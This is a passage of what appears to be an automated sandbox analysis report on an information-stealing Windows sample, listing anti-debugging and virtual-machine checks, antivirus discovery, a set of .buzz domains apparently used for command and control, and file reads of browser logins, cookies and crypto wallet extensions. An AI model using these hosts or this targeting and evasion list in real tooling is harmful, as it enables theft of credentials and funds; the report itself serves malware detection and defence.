              Source: b0ho5YYSdo.exe, 00000000.00000003.2245737585.0000000005538000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
              Source: b0ho5YYSdo.exe, 00000000.00000003.2245737585.0000000005538000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696497155t
              Source: b0ho5YYSdo.exe, 00000000.00000003.2245737585.0000000005538000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696497155s
              Source: b0ho5YYSdo.exe, 00000000.00000002.2342296900.0000000001124000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: b0ho5YYSdo.exe, 00000000.00000003.2245737585.0000000005538000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696497155}
              Source: b0ho5YYSdo.exe, 00000000.00000003.2245737585.0000000005538000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
              Source: b0ho5YYSdo.exe, 00000000.00000003.2245737585.0000000005538000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696497155x
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeOpen window title or class name: ollydbg
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: NTICE
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: SICE
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: SIWVID
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeProcess queried: DebugPortJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: b0ho5YYSdo.exe, 00000000.00000002.2342173426.0000000000F51000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: hummskitnj.buzz
              Source: b0ho5YYSdo.exe, 00000000.00000002.2342173426.0000000000F51000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: cashfuzysao.buzz
              Source: b0ho5YYSdo.exe, 00000000.00000002.2342173426.0000000000F51000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: appliacnesot.buzz
              Source: b0ho5YYSdo.exe, 00000000.00000002.2342173426.0000000000F51000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: screwamusresz.buzz
              Source: b0ho5YYSdo.exe, 00000000.00000002.2342173426.0000000000F51000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: inherineau.buzz
              Source: b0ho5YYSdo.exe, 00000000.00000002.2342173426.0000000000F51000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: scentniej.buzz
              Source: b0ho5YYSdo.exe, 00000000.00000002.2342173426.0000000000F51000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: rebuildeso.buzz
              Source: b0ho5YYSdo.exe, 00000000.00000002.2342173426.0000000000F51000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: prisonyfork.buzz
              Source: b0ho5YYSdo.exe, 00000000.00000002.2342173426.0000000000F51000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: mindhandru.buzz
              Source: b0ho5YYSdo.exe, 00000000.00000002.2342296900.0000000001124000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: JProgram Manager
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: b0ho5YYSdo.exe, b0ho5YYSdo.exe, 00000000.00000003.2326502056.0000000000729000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2312595522.00000000054C9000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2339796853.00000000054CC000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000002.2347127317.00000000054CC000.00000004.00000800.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000002.2341027601.000000000072A000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2326355109.0000000000725000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2326428175.00000000054CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: b0ho5YYSdo.exe, 00000000.00000002.2340795803.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, b0ho5YYSdo.exe, 00000000.00000003.2339878402.00000000006DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: Process Memory Space: b0ho5YYSdo.exe PID: 7412, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: b0ho5YYSdo.exeString found in binary or memory: %appdata%\Electrum\wallets
              Source: b0ho5YYSdo.exeString found in binary or memory: %appdata%\ElectronCash\wallets
              Source: b0ho5YYSdo.exeString found in binary or memory: Wallets/JAXX New Version
              Source: b0ho5YYSdo.exeString found in binary or memory: window-state.json
              Source: b0ho5YYSdo.exeString found in binary or memory: %appdata%\Exodus\exodus.wallet
              Source: b0ho5YYSdo.exeString found in binary or memory: %appdata%\Exodus\exodus.wallet
              Source: b0ho5YYSdo.exe, 00000000.00000003.2230325310.000000000073F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance
              Source: b0ho5YYSdo.exeString found in binary or memory: %appdata%\Ethereum
              Source: b0ho5YYSdo.exeString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: b0ho5YYSdo.exeString found in binary or memory: keystore
              Source: b0ho5YYSdo.exe, 00000000.00000003.2230325310.00000000006D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\prefs.jsJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
